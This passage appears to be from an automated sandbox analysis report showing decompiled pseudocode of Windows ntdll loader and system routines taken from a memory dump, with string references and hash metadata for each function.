                            															asm("movsd");
                            															asm("movsd");
                            															 *_t118 =  *_t118 + 1;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															_t95 = E013161A0( &_v32);
                            															__eflags = _t95;
                            															if(_t95 != 0) {
                            																__eflags = _v32 | _v28;
                            																if((_v32 | _v28) != 0) {
                            																	_t71 = _t118 + 0x40; // 0x3f
                            																	_t134 = _t71;
                            																	goto L55;
                            																}
                            															}
                            															goto L30;
                            														}
                            													}
                            													goto L56;
                            												}
                            												_t92 = 0x13d5c64 + _t91 * 8;
                            												asm("lock xadd [eax], ecx");
                            												_t131 = (_t129 | 0xffffffff) - 1;
                            												goto L37;
                            											}
                            										}
                            										goto L56;
                            									} else {
                            										_t143 = E012F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                            										__eflags = _t143;
                            										if(_t143 != 0) {
                            											_t157 = _v12;
                            											_t103 = 0;
                            											__eflags = 0;
                            											_t136 =  &(_t157[1]);
                            											 *(_t161 + 0x64) = _t136;
                            											_t151 =  *_t157;
                            											_v20 = _t136;
                            											while(1) {
                            												__eflags =  *((intOrPtr*)(0x13d5c60 + _t103 * 8)) - _t151;
                            												if( *((intOrPtr*)(0x13d5c60 + _t103 * 8)) == _t151) {
                            													break;
                            												}
                            												_t103 = _t103 + 1;
                            												__eflags = _t103 - 5;
                            												if(_t103 < 5) {
                            													continue;
                            												}
                            												L21:
                            												_t105 = E0132F380(_t136, 0x12c1184, 0x10);
                            												__eflags = _t105;
                            												if(_t105 != 0) {
                            													__eflags =  *_t157 -  *_v16;
                            													if( *_t157 >=  *_v16) {
                            														goto L22;
                            													} else {
                            														asm("cdq");
                            														_t166 = _t157[5] & 0x0000ffff;
                            														_t108 = _t157[5] & 0x0000ffff;
                            														asm("cdq");
                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                            														if(__eflags > 0) {
                            															L29:
                            															E01302280(_t108, 0x13d86cc);
                            															 *_t118 =  *_t118 + 1;
                            															_t42 = _t118 + 0x40; // 0x3f
                            															_t156 = _t42;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															_t110 = E013161A0( &_v32);
                            															__eflags = _t110;
                            															if(_t110 != 0) {
                            																__eflags = _v32 | _v28;
                            																if((_v32 | _v28) != 0) {
                            																	_t134 = _v20;
                            																	L55:
                            																	E013B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                            																}
                            															}
                            															L30:
                            															 *_t118 =  *_t118 + 1;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															E012FFFB0(_t118, _t156, 0x13d86cc);
                            															goto L22;
                            														} else {
                            															if(__eflags < 0) {
                            																goto L22;
                            															} else {
                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                            																	goto L22;
                            																} else {
                            																	goto L29;
                            																}
                            															}
                            														}
                            													}
                            													goto L56;
                            												}
                            												goto L22;
                            											}
                            											asm("lock inc dword [eax]");
                            											goto L21;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						return _t143;
                            					}
                            				} else {
                            					_push( &_v8);
                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                            					_push(__ecx + 0x40);
                            					_push(_t121);
                            					_push(0xffffffff);
                            					_t80 = E01329A00();
                            					_t159 = _t80;
                            					if(_t159 < 0) {
                            						L8:
                            						return _t80;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				L56:
                            			}












































                            0x012f888e
                            0x012f8891
                            0x012f8891
                            0x012f8898
                            0x00000000
                            0x00000000
                            0x012f889a
                            0x012f889b
                            0x012f889e
                            0x00000000
                            0x00000000
                            0x012f88a0
                            0x012f88a8
                            0x012f88b0
                            0x012f88b2
                            0x012f88d3
                            0x012f88d5
                            0x00000000
                            0x012f88d7
                            0x012f88db
                            0x012f88dc
                            0x012f88e0
                            0x012f88e8
                            0x012f88ee
                            0x012f88f0
                            0x012f88f3
                            0x012f88fc
                            0x012f8901
                            0x012f8906
                            0x012f890c
                            0x012f890c
                            0x012f890f
                            0x012f8916
                            0x012f8917
                            0x012f8918
                            0x012f8919
                            0x012f891a
                            0x012f891f
                            0x012f8921
                            0x01349c52
                            0x01349c55
                            0x01349c5b
                            0x01349cac
                            0x01349cc0
                            0x01349cc0
                            0x01349c55
                            0x012f8927
                            0x012f8927
                            0x012f892f
                            0x012f8933
                            0x00000000
                            0x012f88f5
                            0x012f88f5
                            0x00000000
                            0x012f88f7
                            0x012f88f7
                            0x012f88fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f88fa
                            0x012f88f5
                            0x012f88f3
                            0x00000000
                            0x012f88d5
                            0x00000000
                            0x012f88b2
                            0x012f88c9
                            0x00000000
                            0x012f88c9
                            0x012f887f
                            0x012f886a
                            0x012f8857
                            0x012f8852
                            0x012f88bf
                            0x012f88bf
                            0x012f87aa
                            0x012f87ad
                            0x012f87ae
                            0x012f87b4
                            0x012f87b5
                            0x012f87b6
                            0x012f87b8
                            0x012f87bd
                            0x012f87c1
                            0x012f87f4
                            0x012f87fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f87c1
                            0x00000000

                            Strings
                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01349C18
                            • minkernel\ntdll\ldrsnap.c, xrefs: 01349C28
                            • LdrpDoPostSnapWork, xrefs: 01349C1E
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                            • API String ID: 2994545307-1948996284
                            • Opcode ID: 937b071af635bd5b209cb977920bb2af94b9c4a2acb17aadfb590c7e400e9639
                            • Instruction ID: 02b3d9b905feac8d2963434f256dfe4370734ee7a251fdb7cb3b51d767b5ae07
                            • Opcode Fuzzy Hash: 937b071af635bd5b209cb977920bb2af94b9c4a2acb17aadfb590c7e400e9639
                            • Instruction Fuzzy Hash: 9891E271A2021A9BEF18DF59D481ABAFBB9FF44318F15417DDB01AB251D730AD01CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E012F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				signed int _t73;
                            				void* _t77;
                            				char* _t82;
                            				char* _t87;
                            				signed char* _t97;
                            				signed char _t102;
                            				intOrPtr _t107;
                            				signed char* _t108;
                            				intOrPtr _t112;
                            				intOrPtr _t124;
                            				intOrPtr _t125;
                            				intOrPtr _t126;
                            
                            				_t107 = __edx;
                            				_v12 = __ecx;
                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                            				_t124 = 0;
                            				_v20 = __edx;
                            				if(E012FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                            					_t112 = _v8;
                            				} else {
                            					_t112 = 0;
                            					_v8 = 0;
                            				}
                            				if(_t112 != 0) {
                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                            						_t124 = 0xc000007b;
                            						goto L8;
                            					}
                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                            					 *(_t125 + 0x34) = _t73;
                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                            						goto L3;
                            					}
                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                            					_t124 = E012EC9A4( *((intOrPtr*)(_t125 + 0x18)));
                            					if(_t124 < 0) {
                            						goto L8;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                            						L8:
                            						return _t124;
                            					}
                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                            							goto L5;
                            						}
                            						_t102 =  *0x13d5780; // 0x0
                            						if((_t102 & 0x00000003) != 0) {
                            							E01365510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                            							_t102 =  *0x13d5780; // 0x0
                            						}
                            						if((_t102 & 0x00000010) != 0) {
                            							asm("int3");
                            						}
                            						_t124 = 0xc0000428;
                            						goto L8;
                            					}
                            					L5:
                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                            						goto L8;
                            					}
                            					_t77 = _a4 - 0x40000003;
                            					if(_t77 == 0 || _t77 == 0x33) {
                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                            						if(E01307D50() != 0) {
                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            						} else {
                            							_t82 = 0x7ffe0384;
                            						}
                            						_t108 = 0x7ffe0385;
                            						if( *_t82 != 0) {
                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                            								if(E01307D50() == 0) {
                            									_t97 = 0x7ffe0385;
                            								} else {
                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            								}
                            								if(( *_t97 & 0x00000020) != 0) {
                            									E01367016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                            								}
                            							}
                            						}
                            						if(_a4 != 0x40000003) {
                            							L14:
                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                            							if(E01307D50() != 0) {
                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            							} else {
                            								_t87 = 0x7ffe0384;
                            							}
                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                            								if(E01307D50() != 0) {
                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            								}
                            								if(( *_t108 & 0x00000020) != 0) {
                            									E01367016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                            								}
                            							}
                            							goto L8;
                            						} else {
                            							_v16 = _t125 + 0x24;
                            							_t124 = E0131A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                            							if(_t124 < 0) {
                            								E012EB1E1(_t124, 0x1490, 0, _v16);
                            								goto L8;
                            							}
                            							goto L14;
                            						}
                            					} else {
                            						goto L8;
                            					}
                            				}
                            			}





















                            Strings
                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01349891
                            • LdrpCompleteMapModule, xrefs: 01349898
                            • minkernel\ntdll\ldrmap.c, xrefs: 013498A2
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                            • API String ID: 0-1676968949
                            • Opcode ID: fd7a041af300553b9a6e335d8199e4bd01761de75383a0b48ae353f0b0ad05f6
                            • Instruction ID: eb8ab0907ad23cddd67c48c2a2e0016aeb8dab7824e73a1e1cb89c43783ffc11
                            • Opcode Fuzzy Hash: fd7a041af300553b9a6e335d8199e4bd01761de75383a0b48ae353f0b0ad05f6
                            • Instruction Fuzzy Hash: D251BF356207469BEB22CF6CC944B2ABBE4AB04718F1406AEEB519B7D2D774E900C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E012EE620(void* __ecx, short* __edx, short* _a4) {
                            				char _v16;
                            				char _v20;
                            				intOrPtr _v24;
                            				char* _v28;
                            				char _v32;
                            				char _v36;
                            				char _v44;
                            				signed int _v48;
                            				intOrPtr _v52;
                            				void* _v56;
                            				void* _v60;
                            				char _v64;
                            				void* _v68;
                            				void* _v76;
                            				void* _v84;
                            				signed int _t59;
                            				signed int _t74;
                            				signed short* _t75;
                            				signed int _t76;
                            				signed short* _t78;
                            				signed int _t83;
                            				short* _t93;
                            				signed short* _t94;
                            				short* _t96;
                            				void* _t97;
                            				signed int _t99;
                            				void* _t101;
                            				void* _t102;
                            
                            				_t80 = __ecx;
                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                            				_t96 = __edx;
                            				_v44 = __edx;
                            				_t78 = 0;
                            				_v56 = 0;
                            				if(__ecx == 0 || __edx == 0) {
                            					L28:
                            					_t97 = 0xc000000d;
                            				} else {
                            					_t93 = _a4;
                            					if(_t93 == 0) {
                            						goto L28;
                            					}
                            					_t78 = E012EF358(__ecx, 0xac);
                            					if(_t78 == 0) {
                            						_t97 = 0xc0000017;
                            						L6:
                            						if(_v56 != 0) {
                            							_push(_v56);
                            							E013295D0();
                            						}
                            						if(_t78 != 0) {
                            							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                            						}
                            						return _t97;
                            					}
                            					E0132FA60(_t78, 0, 0x158);
                            					_v48 = _v48 & 0x00000000;
                            					_t102 = _t101 + 0xc;
                            					 *_t96 = 0;
                            					 *_t93 = 0;
                            					E0132BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                            					_v36 = 0x18;
                            					_v28 =  &_v44;
                            					_v64 = 0;
                            					_push( &_v36);
                            					_push(0x20019);
                            					_v32 = 0;
                            					_push( &_v64);
                            					_v24 = 0x40;
                            					_v20 = 0;
                            					_v16 = 0;
                            					_t97 = E01329600();
                            					if(_t97 < 0) {
                            						goto L6;
                            					}
                            					E0132BB40(0,  &_v36, L"InstallLanguageFallback");
                            					_push(0);
                            					_v48 = 4;
                            					_t97 = L012EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                            					if(_t97 >= 0) {
                            						if(_v52 != 1) {
                            							L17:
                            							_t97 = 0xc0000001;
                            							goto L6;
                            						}
                            						_t59 =  *_t78 & 0x0000ffff;
                            						_t94 = _t78;
                            						_t83 = _t59;
                            						if(_t59 == 0) {
                            							L19:
                            							if(_t83 == 0) {
                            								L23:
                            								E0132BB40(_t83, _t102 + 0x24, _t78);
                            								if(L012F43C0( &_v48,  &_v64) == 0) {
                            									goto L17;
                            								}
                            								_t84 = _v48;
                            								 *_v48 = _v56;
                            								if( *_t94 != 0) {
                            									E0132BB40(_t84, _t102 + 0x24, _t94);
                            									if(L012F43C0( &_v48,  &_v64) != 0) {
                            										 *_a4 = _v56;
                            									} else {
                            										_t97 = 0xc0000001;
                            										 *_v48 = 0;
                            									}
                            								}
                            								goto L6;
                            							}
                            							_t83 = _t83 & 0x0000ffff;
                            							while(_t83 == 0x20) {
                            								_t94 =  &(_t94[1]);
                            								_t74 =  *_t94 & 0x0000ffff;
                            								_t83 = _t74;
                            								if(_t74 != 0) {
                            									continue;
                            								}
                            								goto L23;
                            							}
                            							goto L23;
                            						} else {
                            							goto L14;
                            						}
                            						while(1) {
                            							L14:
                            							_t27 =  &(_t94[1]); // 0x2
                            							_t75 = _t27;
                            							if(_t83 == 0x2c) {
                            								break;
                            							}
                            							_t94 = _t75;
                            							_t76 =  *_t94 & 0x0000ffff;
                            							_t83 = _t76;
                            							if(_t76 != 0) {
                            								continue;
                            							}
                            							goto L23;
                            						}
                            						 *_t94 = 0;
                            						_t94 = _t75;
                            						_t83 =  *_t75 & 0x0000ffff;
                            						goto L19;
                            					}
                            				}
                            			}
































                            Strings
                            • InstallLanguageFallback, xrefs: 012EE6DB
                            • @, xrefs: 012EE6C0
                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012EE68C
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                            • API String ID: 0-1757540487
                            • Opcode ID: 1281cfea396d6009dfcb4a743414078c88207cd7488e2f9f15260545202472d8
                            • Instruction ID: c1fa0448f6a865bdd82888884a61906c5e709a6a403da5d990df4fac3cf3ecb8
                            • Opcode Fuzzy Hash: 1281cfea396d6009dfcb4a743414078c88207cd7488e2f9f15260545202472d8
                            • Instruction Fuzzy Hash: 0151E6729143569BD714DF28C444A7BB7E8BF88618F45092EFA85E7240F734EA04C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E013AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                            				signed int _v20;
                            				char _v24;
                            				signed int _v40;
                            				char _v44;
                            				intOrPtr _v48;
                            				signed int _v52;
                            				unsigned int _v56;
                            				char _v60;
                            				signed int _v64;
                            				char _v68;
                            				signed int _v72;
                            				void* __ebx;
                            				void* __edi;
                            				char _t87;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t100;
                            				intOrPtr* _t113;
                            				signed int _t122;
                            				void* _t132;
                            				void* _t135;
                            				signed int _t139;
                            				signed int* _t141;
                            				signed int _t146;
                            				signed int _t147;
                            				void* _t153;
                            				signed int _t155;
                            				signed int _t159;
                            				char _t166;
                            				void* _t172;
                            				void* _t176;
                            				signed int _t177;
                            				intOrPtr* _t179;
                            
                            				_t179 = __ecx;
                            				_v48 = __edx;
                            				_v68 = 0;
                            				_v72 = 0;
                            				_push(__ecx[1]);
                            				_push( *__ecx);
                            				_push(0);
                            				_t153 = 0x14;
                            				_t135 = _t153;
                            				_t132 = E013ABBBB(_t135, _t153);
                            				if(_t132 == 0) {
                            					_t166 = _v68;
                            					goto L43;
                            				} else {
                            					_t155 = 0;
                            					_v52 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v56 = __ecx[1];
                            					if( *__ecx >> 8 < 2) {
                            						_t155 = 1;
                            						_v52 = 1;
                            					}
                            					_t139 = _a4;
                            					_t87 = (_t155 << 0xc) + _t139;
                            					_v60 = _t87;
                            					if(_t87 < _t139) {
                            						L11:
                            						_t166 = _v68;
                            						L12:
                            						if(_t132 != 0) {
                            							E013ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                            						}
                            						L43:
                            						if(_v72 != 0) {
                            							_push( *((intOrPtr*)(_t179 + 4)));
                            							_push( *_t179);
                            							_push(0x8000);
                            							E013AAFDE( &_v72,  &_v60);
                            						}
                            						L46:
                            						return _t166;
                            					}
                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                            					asm("sbb edi, edi");
                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                            					if(_t90 != 0) {
                            						_push(0);
                            						_push(0x14);
                            						_push( &_v44);
                            						_push(3);
                            						_push(_t179);
                            						_push(0xffffffff);
                            						if(E01329730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                            							_push(_t139);
                            							E013AA80D(_t179, 1, _v40, 0);
                            							_t172 = 4;
                            						}
                            					}
                            					_t141 =  &_v72;
                            					if(E013AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                            						_v64 = _a4;
                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                            						asm("sbb edi, edi");
                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                            						if(_t94 != 0) {
                            							_push(0);
                            							_push(0x14);
                            							_push( &_v24);
                            							_push(3);
                            							_push(_t179);
                            							_push(0xffffffff);
                            							if(E01329730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                            								_push(_t141);
                            								E013AA80D(_t179, 1, _v20, 0);
                            								_t176 = 4;
                            							}
                            						}
                            						if(E013AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                            							goto L11;
                            						} else {
                            							_t177 = _v64;
                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                            							_t100 = _v52 + _v52;
                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                            							 *(_t132 + 0x10) = _t146;
                            							asm("bsf eax, [esp+0x18]");
                            							_v52 = _t100;
                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                            							_t47 =  &_a8;
                            							 *_t47 = _a8 & 0x00000001;
                            							if( *_t47 == 0) {
                            								E01302280(_t179 + 0x30, _t179 + 0x30);
                            							}
                            							_t147 =  *(_t179 + 0x34);
                            							_t159 =  *(_t179 + 0x38) & 1;
                            							_v68 = 0;
                            							if(_t147 == 0) {
                            								L35:
                            								E012FB090(_t179 + 0x34, _t147, _v68, _t132);
                            								if(_a8 == 0) {
                            									E012FFFB0(_t132, _t177, _t179 + 0x30);
                            								}
                            								asm("lock xadd [eax], ecx");
                            								asm("lock xadd [eax], edx");
                            								_t132 = 0;
                            								_v72 = _v72 & 0;
                            								_v68 = _v72;
                            								if(E01307D50() == 0) {
                            									_t113 = 0x7ffe0388;
                            								} else {
                            									_t177 = _v64;
                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            								}
                            								if( *_t113 == _t132) {
                            									_t166 = _v68;
                            									goto L46;
                            								} else {
                            									_t166 = _v68;
                            									E0139FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                            									goto L12;
                            								}
                            							} else {
                            								L23:
                            								while(1) {
                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                            										_t122 =  *_t147;
                            										if(_t159 == 0) {
                            											L32:
                            											if(_t122 == 0) {
                            												L34:
                            												_v68 = 0;
                            												goto L35;
                            											}
                            											L33:
                            											_t147 = _t122;
                            											continue;
                            										}
                            										if(_t122 == 0) {
                            											goto L34;
                            										}
                            										_t122 = _t122 ^ _t147;
                            										goto L32;
                            									}
                            									_t122 =  *(_t147 + 4);
                            									if(_t159 == 0) {
                            										L27:
                            										if(_t122 != 0) {
                            											goto L33;
                            										}
                            										L28:
                            										_v68 = 1;
                            										goto L35;
                            									}
                            									if(_t122 == 0) {
                            										goto L28;
                            									}
                            									_t122 = _t122 ^ _t147;
                            									goto L27;
                            								}
                            							}
                            						}
                            					}
                            					_v72 = _v72 & 0x00000000;
                            					goto L11;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction ID: a5c7e1833bab32d4a881397fb26bc2898452e5743cfa6f654bb22f9e79d21632
                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction Fuzzy Hash: 58918F326043429FE724CE29C845B1BBBE9EF84728F54893DF6A5CB290E775E904CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E013651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed short* _t63;
                            				signed int _t64;
                            				signed int _t65;
                            				signed int _t67;
                            				intOrPtr _t74;
                            				intOrPtr _t84;
                            				intOrPtr _t88;
                            				intOrPtr _t94;
                            				void* _t100;
                            				void* _t103;
                            				intOrPtr _t105;
                            				signed int _t106;
                            				short* _t108;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int* _t115;
                            				signed short* _t117;
                            				void* _t118;
                            				void* _t119;
                            
                            				_push(0x80);
                            				_push(0x13c05f0);
                            				E0133D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                            				_t115 =  *(_t118 + 0xc);
                            				 *(_t118 - 0x7c) = _t115;
                            				 *((char*)(_t118 - 0x65)) = 0;
                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            				_t113 = 0;
                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                            				_t100 = __ecx;
                            				if(_t100 == 0) {
                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                            					E012FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					 *((char*)(_t118 - 0x65)) = 1;
                            					_t63 =  *(_t118 - 0x90);
                            					_t101 = _t63[2];
                            					_t64 =  *_t63 & 0x0000ffff;
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					L20:
                            					_t65 = _t64 >> 1;
                            					L21:
                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                            					if(_t108 == 0) {
                            						L27:
                            						 *_t115 = _t65 + 1;
                            						_t67 = 0xc0000023;
                            						L28:
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                            						L29:
                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                            						E013653CA(0);
                            						return E0133D130(0, _t113, _t115);
                            					}
                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                            							 *_t108 = 0;
                            						}
                            						goto L27;
                            					}
                            					 *_t115 = _t65;
                            					_t115 = _t65 + _t65;
                            					E0132F3E0(_t108, _t101, _t115);
                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                            					_t67 = 0;
                            					goto L28;
                            				}
                            				_t103 = _t100 - 1;
                            				if(_t103 == 0) {
                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                            					_t74 = E01303690(1, _t117, 0x12c1810, _t118 - 0x74);
                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                            					_t101 = _t117[2];
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					if(_t74 < 0) {
                            						_t64 =  *_t117 & 0x0000ffff;
                            						_t115 =  *(_t118 - 0x7c);
                            						goto L20;
                            					}
                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                            					_t115 =  *(_t118 - 0x7c);
                            					goto L21;
                            				}
                            				if(_t103 == 1) {
                            					_t105 = 4;
                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                            					_push(_t118 - 0x70);
                            					_push(0);
                            					_push(0);
                            					_push(_t105);
                            					_push(_t118 - 0x78);
                            					_push(0x6b);
                            					 *((intOrPtr*)(_t118 - 0x64)) = E0132AA90();
                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            					_t113 = L01304620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                            					if(_t113 != 0) {
                            						_push(_t118 - 0x70);
                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                            						_push(_t113);
                            						_push(4);
                            						_push(_t118 - 0x78);
                            						_push(0x6b);
                            						_t84 = E0132AA90();
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                            						if(_t84 < 0) {
                            							goto L29;
                            						}
                            						_t110 = 0;
                            						_t106 = 0;
                            						while(1) {
                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                            							 *(_t118 - 0x88) = _t106;
                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                            								break;
                            							}
                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                            							_t106 = _t106 + 1;
                            						}
                            						_t88 = E0136500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                            						_t119 = _t119 + 0x1c;
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                            						if(_t88 < 0) {
                            							goto L29;
                            						}
                            						_t101 = _t118 - 0x3c;
                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                            						goto L21;
                            					}
                            					_t67 = 0xc0000017;
                            					goto L28;
                            				}
                            				_push(0);
                            				_push(0x20);
                            				_push(_t118 - 0x60);
                            				_push(0x5a);
                            				_t94 = E01329860();
                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                            				if(_t94 < 0) {
                            					goto L29;
                            				}
                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                            					_t101 = L"Legacy";
                            					_push(6);
                            				} else {
                            					_t101 = L"UEFI";
                            					_push(4);
                            				}
                            				_pop(_t65);
                            				goto L21;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: c40cf1454229e7a6edf3a602102d4984441c3ade941e2d2308bbca3aff8c8256
                            • Instruction ID: 4f671659d7b4500851b5a976e9efe3827b525c749671c0fde5cc388328227930
